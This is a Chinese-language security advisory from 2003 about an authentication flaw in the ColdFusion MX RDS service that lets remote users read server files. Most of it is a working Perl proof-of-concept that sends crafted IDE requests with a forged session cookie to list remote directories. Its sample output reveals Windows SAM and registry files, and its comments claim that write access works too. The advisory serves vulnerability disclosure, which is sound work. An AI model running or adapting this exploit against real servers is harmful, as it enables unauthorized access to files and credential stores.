安全研究

安全漏洞
Macromedia ColdFusion MX远程开发服务文件泄露漏洞

发布日期:2003-07-05
更新日期:2003-07-10

受影响系统:
Macromedia ColdFusion Server MX Professional
Macromedia ColdFusion Server MX Enterprise
Macromedia ColdFusion Server MX Developer
Macromedia ColdFusion Server MX 6.0
描述:
BUGTRAQ  ID: 8109

Macromedia ColdFusion MX Server是一款强大的WEB应用服务程序,可以自动建立站点和WEB应用程序。

ColdFusion MX的RDS服务存在漏洞,远程攻击者可以利用这个漏洞未授权访问服务器上的数据,造成文件信息泄露。

ColdFusion RDS允许开发者安全的访问远程文件和数据资源,及调试CFML代码。开发者可以使用RDS通过ColdFusion Studio、Homesite+和Dreamweaver MX访问远程开发服务器上的文件和数据库。在CFMX下,RDS是运行在CF应用服务帐户上下文的Java Servlet。如果正确配置RDS,则需要密码来验证远程的开发者访问。由于在与ColdFusion MX服务器通信时验证过程中存在问题,可导致远程用户重新配置开发服务器上属性,并用来访问服务器上的文件。

<*来源:rs2112 (rs2112@hushmail.com
  
  链接:http://sec.angrypacket.com/advisories/0006_AP.CF-rds-dump.txt
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Victim1 <victim1@angrypacket.com>提供了如下测试方法:

#!/usr/bin/perl
# RDS_c_Dump.pl
# victim1@angrypacket.com

## BIG NOTE -> aka ( DISCLAIMER ): if you do something retarded with this code or modification of this code you are completely on your OWN,
# I or rs2112 take no responsibilty for your stupid actions, A JUST BE KNOWN ! This is meant for administrators to protect themselves against
# attack and thats it.

## CF 6 MX Server does several things in order to get remote dir structure so we will need
# to recreate these functions. This is a "almost" complete emulation of a dreamweaver client connection just FYI,
# in like one full HTTP1/1 session witin netcat.
#
# I would like to point out that the ASPSESSID never validates so you can change this on the fly.
#
# Also I would like to say Macromedia's phone support sucks ass, I called trying to be a nice guy ( to follow up on email ) and
# they attempted to belittle my intelligence on the phone.. . OH and yes I did email them several times with no response.
#
# You can Write as well, I have tested and this works fine. If you change the file to and *.exe it will attempt to become and
# 16bit dos application on the remote box FYI.
#
# Requests are sent in this order to get a remote dir structure:
# NOTE: Create dir retrieval array.
#
# ANOTHER NOTE:
# Due to certian current situations I am not allowed to release full exploit code with ( READ, RETRIEVE, WRITE ) functions, I have fully working code,
# If you email me I will not send it to you, so basically dont bother.
#
# Im sorry for being such a foil fart but hey, you understand im shure.
#
# Sample output:
# --------------------------------
# Vic7im1@cipher:~/Scripts/RDS_Sploit$ perl RDS_c_Dump.pl
#
# POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1
#
# Request String Value: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:
# Content-Length: 37
# Please wait.. ..
# HTTP/1.1 100 Continue
# Server: Microsoft-IIS/5.0
# Date: Tue, 01 Jul 2003 10:30:43 GMT
#
# HTTP/1.1 200 OK
# Server: Microsoft-IIS/5.0
# Date: Tue, 01 Jul 2003 10:30:43 GMT
# Connection: close
# Content-Type: text/html
#
# 50:2:F:11:autoexec.nt1:63:4383:0,02:F:9:config.nt1:64:25773:0,02:F:7:default1:66:1187843:0,02:F:10:ntuser.dat1:66:1187843:0,02:F:3:
# sam1:65:204803:0,02:F:12:secsetup.inf1:66:5735303:0,02:F:8:security1:65:286723:0,02:F:9:setup.log1:66:1551943:0,02:F:8:
# software1:67:65331203:0,02:F:6:system1:66:9748483:0,0
# Vic7im1@cipher:~/Scripts/RDS_Sploit$
# ----------------------------------


use strict;
use IO::Socket;

use vars qw($response @clength @rarray);

## Dreamweaver string requests to ide.cfm
## --------------------------------------
#1:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:            Content-Length: 46
#2:  3:STR:7:C:/_mm/STR:1:*STR:0:                      Content-Length: 28
#3:  3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:           Content-Length: 47
#4:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:            Content-Length: 46
#5:  3:STR:10:C:/_notes/STR:1:*STR:0:                      Content-Length: 32
#6:  5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0         Content-Length: 50
#7:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:            Content-Length: 46
#8:  5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:     Content-Length: 51
#9:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:        Content-Length: 46
#10: 3:STR:3:C:/STR:1:*STR:0:                    Content-Length: 24
#11: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:        Content-Length: 46
#12: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:    Content-Length: 53
#13: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:        Content-Length: 46
#14: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:    Content-Length: 53
#15: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:        Content-Length: 46
#16: 5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:    Content-Length: 51
#17: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:        Content-Length: 46
#18: 3:STR:8:C:/WINNTSTR:1:*STR*STR:0:                Content-Length: 29
#19: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:        Content-Length: 46
#20: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:            Content-Length: 37


# Static Content-Lenght: $string_val if you plan on leaving C:\WINNT\repair you will need to know
# the $string_val.
@clength = ( "Content-Length: 46",
         "Content-Length: 28",
         "Content-Length: 47",
         "Content-Length: 46",
                #"Content-Length: 32",
         #"Content-Length: 50",
         "Content-Length: 46",
         "Content-Length: 51",
         "Content-Length: 46",
         "Content-Length: 24",
         "Content-Length: 46",
         "Content-Length: 53",
         "Content-Length: 46",
         "Content-Length: 53",
         "Content-Length: 46",
         "Content-Length: 51",
         "Content-Length: 46",
         "Content-Length: 29",
         "Content-Length: 46",
         "Content-Length: 37"
       );


@rarray = ( "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
        "3:STR:7:C:/_mm/STR:1:*STR:0:",
        "3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:",
        "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
        #"3:STR:10:C:/_notes/STR:1:*STR:0:",
        #"5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0",
        "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
        "5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:",
        "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
        "3:STR:3:C:/STR:1:*STR:0:",
        "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
        "5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
        "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
        "5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
        "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
        "5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:",
        "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
        "3:STR:8:C:/WINNTSTR:1:*STR*STR:0:",
        "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
        "3:STR:15:C:/WINNT/repairSTR:1:*STR:0:"
        );



system("clear");
# change target addy below.
my $TARGET = "192.168.0.100";
my $PORT = "80";
my $STRING = "C:/WINNT/repair";
my $POST = "POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1\r\n";


print "Generating Socket with Array Directory Values.\n";
my ( $i, $c);
for ( $i = 0; $i < @rarray; $i++  ) {
    for ( $c = 0; $c < @clength; $c++ ) {    
            if( $i == $c ) {
            &gen_sock($TARGET, $PORT, $rarray[$i], $clength[$c]);
        }
    }
}


sub gen_sock() {
    my $sock = new IO::Socket::INET(PeerAddr => $TARGET,
                    PeerPort => $PORT,
                    Proto     => 'tcp',
                    );
    die "Socket Could not be established ! $!" unless $sock;
    print "Target: $TARGET:$PORT\n";
    print "$POST\n";
    print "Request String Value: $rarray[$i]\n";
    print "$clength[$c]\n";
    print "Please wait.. ..\n";
    print $sock "$POST";
    print $sock "Content-Type: application/x-ColdFusionIDE\r\n";
    print $sock "User-Agent: Dreamweaver-RDS-SCM1.00\r\n";
    print $sock "Host: $TARGET\r\n";
    print $sock "$clength[$c]\r\n";
    print $sock "Connection: Keep-Alive\r\n";
    print $sock "Cache-Control: no-cache\r\n";
    print $sock "Cookie: ASPSESSIONIDQQQQGLDK=LPIHIKCAECKACDGPJCOLOAOJ\r\n";
    print $sock "\r\n";
    print $sock "$rarray[$i]";
    
    # lets return and print data to term
    while($response = <$sock>) {
        chomp($response);
        print "$response\n";
    }
    close($sock);
}




+----------- -- -
+ disclaimer
+-------- -- -
READ IN THE SCRIPT.

Oh and Happy 4th of July !
- -- -------------------------


#EOT

建议:
厂商补丁:

Macromedia
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.macromedia.com/

浏览次数:3540
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障